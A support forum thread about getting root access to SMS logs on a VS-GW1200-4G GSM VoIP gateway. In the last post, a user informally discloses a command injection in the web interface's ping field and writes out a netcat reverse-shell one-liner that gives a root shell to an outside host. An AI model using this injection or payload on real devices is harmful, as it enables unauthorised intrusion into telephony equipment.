keywords: ip pbx voip gateway gsm gateway

Notice

The forum is in read only mode.
× Questions about VS-GW2120/GW1600/GW1202 and WGW1002G GSM Series VoIP Gateway

How can I have root access on GSM Gateway VS-GW1200-4G ?

10 years 11 months ago #8814 by bias
I'm interested to transfer the sms log files to another machine. The logs are accessible but th path /tmp/log/asterisk/sms is owned by root and not accessible..

How can i easily have access to the sms logs ?

Thx
10 years 11 months ago #8816 by tim.june
Hi,I am afraid you can not access to the sms like that, the SMS and CDR are stored in sqlite database, not in a log file.
To enble root access via SSH, pls refer this pic:
[attach]296[/attach]

Email: This email address is being protected from spambots. You need JavaScript enabled to view it.
Attachments:
10 years 11 months ago #8817 by miaolin
since the GSM Gateway is based on Asterisk, you can get SMS through AMI with your own application, but this way you have to write your own application and collect SMS online.
10 years 11 months ago #8819 by bias
Thx for you quick reply !!

I already tried to make my own App based on AMI, but I feel much more comfortable if I can do a local treatment.

The post #2 with super as user resolved my problem. I can now scp the /data/log/smsinbox.db and do my local treatments with sqlite3.

Thx a lot...
10 years 11 months ago #8821 by bias
...I just found out that I could have had root access without the interface setting from #2.

By injecting id command on the Network Toolkit page ping field, you have :
--- google.com ping statistics
---4 packets transmitted, 4 packets received, 0% packet lossround-trip min/avg/max = 34.3/35.6/37.3
msuid=0(root) gid=0(root)
Successfully ping [ google.com;id ]

then command :

google.com;rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/ash -i 2>&1|nc yourip 1234 >/tmp/f

and you get a reversed root shell... :-) might not be an issue, but still... you might wanna have a look at it.

could not upload screenshot.

i] Last edited by bias at 2013-6-5 14:33 [/i
Time to create page: 0.037 seconds